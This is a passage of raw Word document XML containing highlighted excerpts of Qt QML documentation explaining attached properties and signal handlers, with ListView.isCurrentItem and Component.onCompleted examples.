          <w:rPr>
            <w:rStyle w:val="apple-converted-space"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r w:rsidRPr="00D60FF5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>in C++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">with particular properties and signals. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Instances of this type can then be created and</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to specific objects </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>at run time</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing those objects to access the properties and signals of the attaching type. These are </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>accessed by prefixing the properties and respective signal handlers with the name of the attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="40424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References to attached properties and handlers take the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> form:</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ag"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;AttachingType&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;propertyName&gt;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tag"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;AttachingType&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.on</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;SignalName&gt;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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2787" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type has an attached property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2788" w:anchor="isCurrentItem-attached-prop" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView.isCurrentItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that is available to each delegate object in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2789" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This can be used by each individual delegate object to determine whether it is the currently selected item in the view:</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ListView</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240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320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model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3</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delegate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30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ListView</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isCurrentItem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"red"</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"yellow"</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In this case, the name of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is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ListView</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the property in question is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isCurrentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, hence the attached property is referred to as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ListView.isCurrentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>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D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An attached signal handler is referred to in the same way</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60FF5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2790" w:anchor="completed-signal" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component.onCompleted</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached signal handler is commonly used to execute some JavaScript code when a component's creation process has been completed. In the example below, once the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2791" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has been fully created, its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Component.onCompleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal handler will automatically be invoked to populate the model:</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ListView</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240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320</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C10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListModel</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        id</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> listModel</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Component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onCompleted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for</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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i</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listModel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append</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>({</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Name"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"Item "</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i</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lastRenderedPageBreak/>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delegate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Text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text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index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Since the name of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is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Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and that type has a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2792" w:anchor="completed-signal" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>completed</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal, the attached signal handler is referred to as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Component.onCompleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2552" w:name="a-note-about-accessing-attached-properti"/>
      <w:bookmarkStart w:id="2553" w:name="_Toc483001087"/>
      <w:bookmarkStart w:id="2554" w:name="_Toc483604422"/>
      <w:bookmarkStart w:id="2555" w:name="_Toc483605642"/>
      <w:bookmarkEnd w:id="2552"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A Note About Accessing Attached Properties and Signal Handlers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2553"/>
      <w:bookmarkEnd w:id="2554"/>
      <w:bookmarkEnd w:id="2555"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>common error is to assume that attached properties and signal handlers are directly accessible from the children of the object to which these attributes have been attached</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not the case</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The instance of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only attached to specific objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, not to the object and all of its children.</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 xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="003C6BC4">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
